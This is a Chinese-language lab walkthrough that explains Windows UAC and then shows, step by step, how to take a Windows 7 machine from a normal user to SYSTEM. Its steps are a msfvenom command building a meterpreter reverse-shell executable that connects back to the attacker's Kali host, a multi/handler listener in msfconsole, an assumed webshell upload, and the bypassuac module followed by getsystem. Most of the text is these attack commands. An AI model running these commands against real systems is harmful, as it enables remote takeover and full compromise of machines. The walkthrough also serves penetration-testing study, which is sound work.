目标IP: windows7
攻击IP:192.168.106.131 kali
一、什么是UAC
用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。
二、实例
比如打开电脑的ensp软件
电脑弹窗显示
在权限提升的时候,会造成一些阻碍
三、突破UAC限制进行提权
第一步:利用msf生成exe反弹shell
命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.106.131 lport=1234 -f exe >sh.exe
第二步:假设目标服务器存在webshell后门,我们已经成功将sh.exe文件上传到目标网站,并运行成功,此处模拟就手工运行,双击运行sh.exe
第三步:打开msfconsole,接受后门文件sh.exe反弹回来的会话
输入命令:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.106.131
lhost => 192.168.106.131
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > exploit
监听会话,只要目标系统的sh.exe文件运行,就会返回会话如下图所示
grtuid查看权限为普通用户权限
可以用exp提权或者msf的getsystem提权
getsystem提权报错,是因为UAC限制的
原因:win7目标机就是普通用户
第四步:UAC提权,利用uac bypass提权模块
命令:use exploit/windows/local/bypassuac
查看会话号,设置会话并攻击
成功利用exp获取权限,但是还是普通用户,此时利用getsystem提权,没有报错,成功提权到system